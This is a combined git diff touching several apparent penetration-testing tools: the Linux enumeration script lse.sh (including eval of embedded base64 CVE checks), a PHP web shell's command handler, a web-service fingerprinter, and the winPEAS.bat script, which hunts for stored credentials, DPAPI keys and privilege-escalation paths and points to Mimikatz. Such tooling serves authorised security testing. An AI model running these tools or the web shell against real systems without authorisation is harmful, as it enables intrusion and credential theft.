||||||
|
|
||||||
##############################################################( recurrent tasks
|
##############################################################( recurrent tasks
|
||||||
lse_run_tests_recurrent_tasks() {
|
lse_run_tests_recurrent_tasks() {
|
||||||
@ -1021,7 +1097,7 @@ lse_run_tests_recurrent_tasks() {
|
|||||||
"Systemd timers" \
|
"Systemd timers" \
|
||||||
'systemctl list-timers --all'
|
'systemctl list-timers --all'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
######################################################################( network
|
######################################################################( network
|
||||||
lse_run_tests_network() {
|
lse_run_tests_network() {
|
||||||
@ -1072,7 +1148,7 @@ lse_run_tests_network() {
|
|||||||
"Listening UDP" \
|
"Listening UDP" \
|
||||||
'netstat -unlp || ss -unlp'
|
'netstat -unlp || ss -unlp'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
#####################################################################( services
|
#####################################################################( services
|
||||||
lse_run_tests_services() {
|
lse_run_tests_services() {
|
||||||
@ -1167,7 +1243,7 @@ lse_run_tests_services() {
|
|||||||
"Systemd config files permissions" \
|
"Systemd config files permissions" \
|
||||||
'ls -lthR /lib/systemd/ /etc/systemd/'
|
'ls -lthR /lib/systemd/ /etc/systemd/'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
#####################################################################( software
|
#####################################################################( software
|
||||||
lse_run_tests_software() {
|
lse_run_tests_software() {
|
||||||
@ -1310,7 +1386,7 @@ lse_run_tests_software() {
|
|||||||
'screen -v'
|
'screen -v'
|
||||||
|
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
###################################################################( containers
|
###################################################################( containers
|
||||||
lse_run_tests_containers() {
|
lse_run_tests_containers() {
|
||||||
@ -1341,7 +1417,7 @@ lse_run_tests_containers() {
|
|||||||
"Is the user a member of any lxc/lxd group?" \
|
"Is the user a member of any lxc/lxd group?" \
|
||||||
'groups | grep $lse_grep_opts "lxc\|lxd"'
|
'groups | grep $lse_grep_opts "lxc\|lxd"'
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
####################################################################( processes
|
####################################################################( processes
|
||||||
lse_run_tests_processes() {
|
lse_run_tests_processes() {
|
||||||
@ -1398,49 +1474,84 @@ lse_run_tests_processes() {
|
|||||||
'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \
|
'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \
|
||||||
"pro001"
|
"pro001"
|
||||||
}
|
}
|
||||||
|
#)
|
||||||
|
|
||||||
|
#########################################################################( CVEs
|
||||||
|
lse_run_tests_cves() {
|
||||||
|
lse_header "cve" "CVEs"
|
||||||
|
if [ "${#lse_cve_list}" = 1 ]; then
|
||||||
|
if [ -z "$lse_selection" ] || printf "%s" "$lse_selection" | grep -iq 'cve'; then
|
||||||
|
printf "%s\n%s\n%s" \
|
||||||
|
" In order to test for CVEs, download lse.sh from the GitHub releases page." \
|
||||||
|
" Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the" \
|
||||||
|
" repository."
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
for lse_cve in $lse_cve_list; do
|
||||||
|
eval "$(printf '%s' "$lse_cve" | base64 -d | gunzip -c)"
|
||||||
|
|
||||||
|
lse_test "$lse_cve_id" "$lse_cve_level" \
|
||||||
|
"$lse_cve_description" \
|
||||||
|
"lse_cve_test"
|
||||||
|
done
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
#)
|
||||||
#
|
#
|
||||||
##)
|
##)
|
||||||
|
|
||||||
#( Main
|
#( Main
|
||||||
while getopts "hcCil:e:p:s:S" option; do
|
main() {
|
||||||
case "${option}" in
|
while getopts "hcCil:e:p:s:S" option; do
|
||||||
c) lse_color=false; lse_grep_opts='--color=never';;
|
case "${option}" in
|
||||||
C) lse_alt_color=true;;
|
c) lse_color=false; lse_grep_opts='--color=never';;
|
||||||
e) lse_exclude_paths "${OPTARG}";;
|
C) lse_alt_color=true;;
|
||||||
i) lse_interactive=false;;
|
e) lse_exclude_paths "${OPTARG}";;
|
||||||
l) lse_set_level "${OPTARG}";;
|
i) lse_interactive=false;;
|
||||||
s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";;
|
l) lse_set_level "${OPTARG}";;
|
||||||
p) lse_proc_time="${OPTARG}";;
|
s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";;
|
||||||
S) lse_serve; exit $?;;
|
p) lse_proc_time="${OPTARG}";;
|
||||||
h) lse_help; exit 0;;
|
S) lse_serve; exit $?;;
|
||||||
*) lse_help; exit 1;;
|
h) lse_help; exit 0;;
|
||||||
esac
|
*) lse_help; exit 1;;
|
||||||
done
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
#trap to exec on SIGINT
|
#trap to exec on SIGINT
|
||||||
trap "lse_exit 1" 2
|
trap "lse_exit 1" 2
|
||||||
|
|
||||||
# use alternative color scheme
|
# use alternative color scheme
|
||||||
$lse_alt_color && lse_recolor
|
$lse_alt_color && lse_recolor
|
||||||
|
|
||||||
lse_request_information
|
lse_request_information
|
||||||
lse_show_info
|
lse_show_info
|
||||||
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
|
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
|
||||||
|
lse_distro_codename=`lse_get_distro_codename`
|
||||||
|
|
||||||
lse_procmon &
|
lse_procmon &
|
||||||
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
|
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
|
||||||
|
|
||||||
lse_run_tests_users
|
## NO WAR
|
||||||
lse_run_tests_sudo
|
lse_header "nowar" "humanity"
|
||||||
lse_run_tests_filesystem
|
lse_test "nowar0" "0" \
|
||||||
lse_run_tests_system
|
'Should we question autocrats and their "military operations"?' \
|
||||||
lse_run_tests_security
|
'cecho " $black$b_blue NO $reset\n $black$b_yellow WAR $reset"'
|
||||||
lse_run_tests_recurrent_tasks
|
|
||||||
lse_run_tests_network
|
|
||||||
lse_run_tests_services
|
|
||||||
lse_run_tests_software
|
|
||||||
lse_run_tests_containers
|
|
||||||
lse_run_tests_processes
|
|
||||||
|
|
||||||
lse_exit 0
|
lse_run_tests_users
|
||||||
|
lse_run_tests_sudo
|
||||||
|
lse_run_tests_filesystem
|
||||||
|
lse_run_tests_system
|
||||||
|
lse_run_tests_security
|
||||||
|
lse_run_tests_recurrent_tasks
|
||||||
|
lse_run_tests_network
|
||||||
|
lse_run_tests_services
|
||||||
|
lse_run_tests_software
|
||||||
|
lse_run_tests_containers
|
||||||
|
lse_run_tests_processes
|
||||||
|
lse_run_tests_cves
|
||||||
|
|
||||||
|
lse_exit 0
|
||||||
|
}
|
||||||
|
|
||||||
|
[ ! "$lse_NO_EXEC" ] && main "$@"
|
||||||
#)
|
#)
|
||||||
|
@ -1,14 +1,22 @@
|
|||||||
<?php
|
<?php
|
||||||
|
|
||||||
|
function expandPath($path) {
|
||||||
|
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
||||||
|
exec("echo $match[1]", $stdout);
|
||||||
|
return $stdout[0] . $match[2];
|
||||||
|
}
|
||||||
|
return $path;
|
||||||
|
}
|
||||||
|
|
||||||
function featureShell($cmd, $cwd) {
|
function featureShell($cmd, $cwd) {
|
||||||
$stdout = array();
|
$stdout = array();
|
||||||
|
|
||||||
if (preg_match("/^\s*cd\s*$/", $cmd)) {
|
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
||||||
// pass
|
chdir(expandPath("~"));
|
||||||
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
|
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
|
||||||
chdir($cwd);
|
chdir($cwd);
|
||||||
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||||
chdir($match[1]);
|
chdir(expandPath($match[1]));
|
||||||
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
|
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
|
||||||
chdir($cwd);
|
chdir($cwd);
|
||||||
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||||
|
@ -8,6 +8,7 @@ import requests
|
|||||||
import urllib.parse
|
import urllib.parse
|
||||||
import util
|
import util
|
||||||
from bs4 import BeautifulSoup
|
from bs4 import BeautifulSoup
|
||||||
|
from crawl_urls import Crawler
|
||||||
|
|
||||||
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
||||||
|
|
||||||
@ -208,7 +209,7 @@ class WebServiceFinder:
|
|||||||
litecart_pattern = re.compile(r"^https://www.litecart.net")
|
litecart_pattern = re.compile(r"^https://www.litecart.net")
|
||||||
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
|
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
|
||||||
|
|
||||||
urls = util.collectUrls(soup)
|
urls = Crawler(self.url).collect_urls(soup)
|
||||||
for url in urls:
|
for url in urls:
|
||||||
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
|
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
|
||||||
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))
|
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))
|
||||||
|
Binary file not shown.
Binary file not shown.
@ -55,7 +55,7 @@ ECHO.
|
|||||||
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
|
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
||||||
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
|
||||||
systeminfo
|
systeminfo
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
@ -174,7 +174,7 @@ CALL :T_Progress 1
|
|||||||
:UACSettings
|
:UACSettings
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
|
CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
|
||||||
ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
|
ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
|
||||||
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
|
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -225,7 +225,7 @@ CALL :T_Progress 1
|
|||||||
:InstalledSoftware
|
:InstalledSoftware
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
|
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
|
||||||
ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed
|
ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
|
||||||
ECHO.
|
ECHO.
|
||||||
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
|
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
|
||||||
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
|
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
|
||||||
@ -236,7 +236,7 @@ CALL :T_Progress 2
|
|||||||
|
|
||||||
:RemodeDeskCredMgr
|
:RemodeDeskCredMgr
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
|
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
|
||||||
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -244,7 +244,7 @@ CALL :T_Progress 1
|
|||||||
:WSUS
|
:WSUS
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m WSUS"
|
CALL :ColorLine " %E%33m[+]%E%97m WSUS"
|
||||||
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
|
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
|
||||||
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
|
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -252,7 +252,7 @@ CALL :T_Progress 1
|
|||||||
:RunningProcesses
|
:RunningProcesses
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
|
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
|
||||||
ECHO. [i] Something unexpected is running? Check for vulnerabilities
|
ECHO. [i] Something unexpected is running? Check for vulnerabilities
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
|
||||||
tasklist /SVC
|
tasklist /SVC
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
@ -273,7 +273,7 @@ CALL :T_Progress 3
|
|||||||
:RunAtStartup
|
:RunAtStartup
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
|
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
|
||||||
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
|
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
|
||||||
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
|
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
|
||||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
|
||||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
|
||||||
@ -297,7 +297,7 @@ CALL :T_Progress 2
|
|||||||
:AlwaysInstallElevated
|
:AlwaysInstallElevated
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
|
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
|
||||||
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
|
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
|
||||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
|
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
|
||||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
|
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
|
||||||
ECHO.
|
ECHO.
|
||||||
@ -361,7 +361,7 @@ CALL :T_Progress 1
|
|||||||
:BasicUserInfo
|
:BasicUserInfo
|
||||||
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
|
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
|
||||||
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
|
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
|
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
|
||||||
net user %username%
|
net user %username%
|
||||||
@ -435,7 +435,7 @@ ECHO.
|
|||||||
|
|
||||||
:ServiceBinaryPermissions
|
:ServiceBinaryPermissions
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
|
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
|
||||||
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
|
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
|
||||||
for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
|
for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
|
||||||
)
|
)
|
||||||
@ -444,7 +444,7 @@ CALL :T_Progress 1
|
|||||||
|
|
||||||
:CheckRegistryModificationAbilities
|
:CheckRegistryModificationAbilities
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
|
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
|
||||||
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
|
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -453,7 +453,7 @@ CALL :T_Progress 1
|
|||||||
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
|
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
|
||||||
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
|
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
|
||||||
ECHO. [i] The permissions are also checked and filtered using icacls
|
ECHO. [i] The permissions are also checked and filtered using icacls
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
|
||||||
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
|
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
|
||||||
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
|
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
|
||||||
ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
|
ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
|
||||||
@ -468,7 +468,7 @@ ECHO.
|
|||||||
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
|
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
|
||||||
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
|
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
|
||||||
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
|
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
|
||||||
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
|
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -477,7 +477,7 @@ CALL :T_Progress 1
|
|||||||
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
|
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
|
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
|
||||||
cmdkey /list
|
cmdkey /list
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
@ -485,14 +485,14 @@ CALL :T_Progress 2
|
|||||||
:DPAPIMasterKeys
|
:DPAPIMasterKeys
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
|
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
|
||||||
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
|
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
|
||||||
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
|
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
|
||||||
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
|
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
|
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
|
||||||
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
|
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
|
||||||
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
|
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
|
||||||
ECHO.
|
ECHO.
|
||||||
ECHO.Looking inside %appdata%\Microsoft\Credentials\
|
ECHO.Looking inside %appdata%\Microsoft\Credentials\
|
||||||
ECHO.
|
ECHO.
|
||||||
@ -565,7 +565,7 @@ CALL :T_Progress 2
|
|||||||
|
|
||||||
:AppCMD
|
:AppCMD
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
|
||||||
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
@ -573,7 +573,7 @@ CALL :T_Progress 2
|
|||||||
:RegFilesCredentials
|
:RegFilesCredentials
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
|
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
|
||||||
ECHO. [i] Searching specific files that may contains credentials.
|
ECHO. [i] Searching specific files that may contains credentials.
|
||||||
